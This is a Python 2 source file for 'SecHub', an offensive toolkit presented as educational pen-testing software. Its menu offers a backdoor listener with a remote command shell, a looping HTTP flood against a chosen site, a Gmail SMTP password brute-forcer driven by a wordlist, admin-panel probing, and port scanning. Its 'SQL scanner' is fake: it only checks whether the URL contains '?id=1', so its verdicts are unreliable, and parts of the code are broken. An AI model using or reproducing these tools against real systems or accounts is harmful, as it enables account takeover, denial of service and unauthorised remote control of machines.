''' Welcome to SecHub ------------------ SecHub is an Open Source Security Tool Kit developed for Pen-Testers, Hackers, and Security Researchers. This tool was developed by Josh, (Yeh, just Josh). This peice of Software is meant to be used for educational purposes only. SecHub is simply ethical and should be used simply good, not for bad. The Developer of this product is not to be held responsible for misuse of this tool. Finally, SecHub is in it's early stages of development, so please report any bugs to the gitHub Repository. Now go Hack The Planet! -SecHub Developer, Josh ''' ##Libraries and Modules## ##---------------------## import os import sys import socket import subprocess from termcolor import colored, cprint from datetime import datetime from urllib2 import Request, urlopen, URLError, HTTPError import time import hashlib import smtplib import threading def secHub(): cprint(""" ______ __ __ __ / \ / | / | / | /$$$$$$ | ______ _______ $$ | $$ | __ __ $$ |____ $$ \__$$/ / \ / |$$ |__$$ |/ | / |$$ \ $$ \ /$$$$$$ |/ $$$$$$$/$$ $$ |$$ | $$ |$$$$$$$ | $$$$$$|$$ $$| $$| $$$$$$$$ |$$$$ | $$$| $$| / \__ $$ |$$$$$$$$/$$ \_____ $$ | $$ |$$ \__$$ |$$ |__$$| $$ $$/ $$ |$$ | $$ | $$ |$$ $$/ $$ $$/ $$$$$$/ $$$$$$$/ $$$$$$$/$$/ $$ /$$$$$$/ $$$$$$$/ Open Source Security Kit Version :: 1.05 Developed By Josh """, 'red', attrs=['bold']) def PlatformCheck(): if sys.platform == 'win32': cprint("\t[!] Windows Detected! secHub is Built For Linux. ", 'red') ##Windows 32-bit Check if sys.platform == 'win64': cprint("\t[!] Windows Detected! secHub is Built For Linux. ", 'red') ##Windows 64-bit Check else: cprint("\t[+] Unix/Linux Kernel Detected...\n", 'green') ##Nothing Beats Linux! PlatformCheck() time.sleep(1) def sockListen(): global host global port global s host = '' port = input("\t() Enter a Port to Listen On: ") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ##Creates Socket try: s.bind((host, port)) except socket.error as e: colored("\t[-] Bind Error: " + str(e), 'red') return False try: os.system('clear') cprint("\t[*] Binding Socket To Port: " + str(port), 'green') s.listen(5) time.sleep(3) cprint("\t[!] Listening For Incoming Intervals", 'blue') time.sleep(3) cprint("\t[+] Awaiting Connection on LAN", 'blue') except socket.error as e: print(str(e)) except KeyboardInterrupt: print("\n\t[-] User Aborted! ") sys.exit(0) def sockAccept(): try: while True: conn, addr = s.accept() ##Accepts Connection from Client print("\t[+] Connection With: " + str(addr[0]) + ":" + str(addr[1])) send_commands(conn) conn.close() except socket.error as e: print(str(e)) except KeyboardInterrupt: print("\n\t[-] User Aborted! ") sys.exit(0) def send_commands(conn): try: while True: command = raw_input("\n\tShell> ") ##Reads Process and opens up Prompt if 'kill' in command: conn.close() s.close() break return None enter_key_on_press = "" if enter_key_on_press in command: return send_commands(conn) if len(str.encode(command)) > 0: conn.send(str.encode(command)) client_responce = str(conn.recv(1024)) print(client_responce) else: conn.send(command) print conn.recv(1024) except socket.error as x: print(str(x)) except Exception: cprint("\t[-] An Error in the Command Shell Has Occured.", 'red') except KeyboardInterrupt: print("\n\n\t[*] User Aborted! ") sys.exit(0) def detectNmap(): try: nmap_boolean = True check_package = subprocess.call("nmap") os.system('clear') print("\tNmap Found!...\n ") except OSError as e: cprint("\t[!] Error: Nmap Not found...\n", 'red') nmap_boolean = False try: print("\t[*] Intalling it For You...") os.system('sudo apt-get install nmap') return detectNmap() except: raise nmap_boolean = False return False except KeyboardInterrupt: print("\n\t[-] User Aborted! ") def nmapBasic(): nmap_host = raw_input("\t(*) Enter HOST/LHOST To Scan: ") start_scan = os.system('sudo nmap -sS -sV ' + nmap_host +'/24') def UnleashTheBeast(): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((beast_input, 80)) ip = socket.gethostbyname(beast_input) time.sleep(1) cprint("\t[*] Flooding " + ip + " with " + troll_input + " Packets." , 'green') s.send("\tGET /" + troll_input + " HTTP/1.1\r\n") s.send("\tHOST: " + beast_input + "\r\n\r\n"); s.close() except socket.error as msg: print(str(msg)) except KeyboardInterrupt: cprint("\n\t[!] User Aborted Flooding!", 'red') sys.exit(0) def md5Hashing(): try: hash_in = raw_input("\t() Please Enter a Word/String To Hash: ") print("\t[*] Hashing...") time.sleep(0.5) md5_encode = hashlib.md5(hash_in.encode()) digested_hash = md5_encode.hexdigest() print("\t" + digested_hash) except: print("\t[-] Could Not Get Hash for {}".format(hash_in)) def gmailBruteForce(): smtp_server = smtplib.SMTP("smtp.gmail.com", 587) smtp_server.ehlo() smtp_server.starttls() target = raw_input("\t() Enter The Targets Email Address: ") passwfile = raw_input("\t() Enter the Password File Path: ") passwfile = open(passwfile, "r") for password in passwfile: try: smtp_server.login(target, password) cprint("\t\n[+] Password Found!: %s " % password, 'green') break except smtplib.SMTPAuthenticationError: cprint("\t[*] Trying Password: %s" % password, 'red') def portScan(): server = raw_input(colored("() Enter a Website/IP to Scan: ", 'blue')) try: serverIP = socket.gethostbyname(server) except socket.gaierror: cprint("[-] Cannot Resolve Hostname", 'red') print "-" * 60 cprint("[!] Please Wait Scanning Remote Host " + serverIP, 'red') print "-" * 60 t1 = datetime.now() try: for port in range(1, 1024): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((serverIP, port)) if result == 0: cprint("[+] Port {}: Open".format(port), 'green') elif result == 1: cprint("[-] Port {}: Closed".format(port), 'blue') sock.close() except socket.error as w: cprint("[-] Could Not Connect to the Remote Host", 'blue') except socket.gaierror: cprint("[-] Could Not Resolve Hostname", 'red') except KeyboardInterrupt: cprint("\n[-] User Aborted! ", 'red') sys.exit() except: cprint("\n\n\t[!] An Unknown Error Has Occured!", 'red') t2 = datetime.now() total = t2 - t1 cprint('\n\t[+]Scanning Complete' + total, 'blue') def adminPanelFinder(): f = open("link.txt", 'r') os.system('clear') link = raw_input(colored("\t(*) Enter Target Website: ", 'blue')) cprint("\t\n[*] Availible Panels: \n\n", 'yellow') while True: sub_link = f.readline() if not sub_link: break req_link = "http://"+link+"/"+sub_link req = Request(req_link) try: response = urlopen(req) except HTTPError as e: continue except URLError as w: continue except KeyboardInterrupt: cprint("\t\n[-] User Aborted Process!", 'red') sys.exit(0) else: cprint("\t[+] Success => " + req_link, 'green') def sqlScanner(): global source sql_errors = [ "error in your SQL syntax : SQL syntax error", "Query failed : Query failed", "supplied argument is not a valid MySQL result resource in Bad argument", "Microsoft JET Database Engine error 80040e14 : JET DBE error", "Error:unknown Unknown error", "Fatal error : Fatal error", "mysql_fetch : MySQL fetch", "Syntax error : Syntax error" ] os.system('clear') vuln = "?id=1" target = raw_input(colored("\t(*) Enter Website Target(Full URL): ", 'blue')) cprint("\t[*] Starting Scan... ", 'green') start_time = time.time() time.sleep(1) cprint("\t[!] Time Started: " + str(start_time) + "\n", 'blue') time.sleep(1) source = "" try: source = urllib2.urlopen(target+"'", timeout=5).read() except KeyboardInterrupt: cprint("\n\t[!] User Aborted Scan! ", 'red') sys.exit(0) except: pass for error in sql_errors: time.sleep(1) cprint("\t[*] Checking Parameter: " + "'" + sql_errors[0] + "'", 'yellow') time.sleep(1) cprint("\t[*] Checking Parameter: " + "'" + sql_errors[1] + "'", 'red') time.sleep(1) cprint("\t[*] Checking Parameter: " + "'" + sql_errors[2] + "'", 'red') time.sleep(1) cprint("\t[*] Checking Parameter: " + "'" + sql_errors[3] + "'", 'blue') time.sleep(1) cprint("\t[*] Checking Parameter: " + "'" + sql_errors[4] + "'", 'blue') time.sleep(1) cprint("\t[*] Checking Parameter: " + "'" + sql_errors[5] + "'", 'green') time.sleep(1) cprint("\t[*] Checking Parameter: " + "'" + sql_errors[6] + "'", 'green') time.sleep(1) cprint("\t[*] Checking Parameter: " + "'" + sql_errors[7] + "'", 'yellow') break if vuln in target: time.sleep(2) cprint("\n\t[+] Target is Vulnerable To SQL Injection! ", 'magenta') return True elif vuln not in target: cprint("\n\t[-] Target is Not Vulnerable to SQL", 'red') return False def Options(): cprint("\t1: Listener and Backdoor\n\t2: Scan Network With Nmap\n\t3: Website/IP Stresser\n\t" "4: MD5 Hashing\n\t5: Gmail BruteForce\n\t6: Port Scanner\n\t7: Website Admin Panel Finder\n\t8: SQL Scanner\n\t" "9: Exit" , 'blue') def main(): os.system('clear') secHub() Options() start_script_input = raw_input(colored("\n\n\troot@secHub:~# ", 'yellow', attrs=['bold'])) print start_script_input if start_script_input == '1': os.system('clear') time.sleep(0.5) sockListen() sockAccept() if start_script_input == '2': secHub() detectNmap() nmapBasic() os.system('clear') return main() if start_script_input == '3': global beast_input global troll_input os.system('clear') beast_input = raw_input(colored("\t() Enter IP/Website To Flood: ", 'blue')) print beast_input os.system('clear') troll_input = raw_input(colored("\t() Packet Number: ", 'blue')) print troll_input os.system('clear') print("\n\t[*] Attacking " + beast_input + "...") time.sleep(1) for x in range(1, 1000): UnleashTheBeast() if start_script_input == '4': os.system('clear') md5Hashing() hashinput = raw_input(colored("() Press 1 to Return to Main Menu: ", 'green')) print hashinput try: if hashinput == '1': return main() except NameError: cprint("[-] Unknown Character! ", 'red') except Exception: print hashinput if start_script_input == '5': os.system('clear') secHub() gmailBruteForce() return main() if start_script_input == '6': os.system('clear') portScan() if start_script_input == '7': adminPanelFinder() if start_script_input == '8': os.system('clear') sqlScanner() if start_script_input == '9': sys.exit(0) if __name__ == "__main__": main()